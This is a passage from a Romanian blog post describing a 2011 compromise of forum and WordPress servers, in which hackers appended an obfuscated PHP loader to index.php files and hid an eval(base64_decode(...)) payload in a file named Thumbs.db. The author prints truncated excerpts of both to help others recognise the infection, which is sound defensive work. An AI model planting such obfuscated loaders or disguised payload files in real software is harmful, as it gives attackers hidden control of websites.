Tag Archives: hack

Servere cu forumuri, wordpress-uri sparte de hackeri

In luna noiembrie 2011 am intalnit un server spart de hackeri. Pe scurt, fisierele index.php au fost editate si la final li s-a adaugat o linie lunga, ce contine urmatoarele linii (am taiat un pic din cârnații de caractere, pentru a nu pune codul în totalitate):

if (!isset($eva1fYlbakBcVSir)) {
$eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8h1Rn1XULdmbqxGU7h1Rn1XULdmbqZVUzElNmNTVGxEeNt1ZzkFcmJyJuUTNyZGJuciLxk2cwRCLiICKuVHdlJHJn4SNykmckRiLnsTKn4iInIiLnAkdX5Uc2dlTshEcMhHT8xFeMx2T4xjWkNTUwVGNdVzWvV1Wc9WT2wlbqZVX3lEclhTTKdWf8oEZzkVNdp2NwZGNVtVX8dmRPF3N1U2cVZDX4lVcdlWWKd2aZBnZtVFfNJ3N1U2cVZDX4lVcdl...";
$eva1tYldakBcVSir = "x73164x72162x65...";
$eva1tYldakBoVS1r = "x65143x61154x70...";
$eva1tYidokBoVSjr = "x3b51x29135x31...";
$eva1tYldokBcVSjr=$eva1tYldakBcVSir($eva1tYldakBoVS1r);
$eva1tYldakBcVSjr=$eva1tYldakBcVSir($eva1tYlbakBcVSir);
$eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016), $eva1fYlbakBcVSir);
$eva1tYXdakAcVSjr = $eva1tYidakBcVSjr[0.031*0.061];
$eva1tYidokBcVSjr = $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);
$eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031]));
$eva1tYldakBcVSir = "";
$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;
$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;
$eva1tYldakBcVSir = "x73164x72x65143x72160164x72";
$eva1tYlbakBcVSir = "x67141x6f133x70170x65";
$eva1tYldakBoVS1r = "x65143x72160";
$eva1tYldakBcVSir = "";
$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;
$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;
}
*/

Codul de mai sus nu functioneaza impreuna cu inca un fisier – numit Thumbs.db – si situat in acelasi director. Exempu de cod din acest fisier:

eval(base64_decode("aWYgKCRldmFsSnlDZUxxSXN0WG9wdWggIT0gNjQ4NzIpIHtmdW5jdGlvbiBldmFsV3FmR0RMSk...
Continue reading »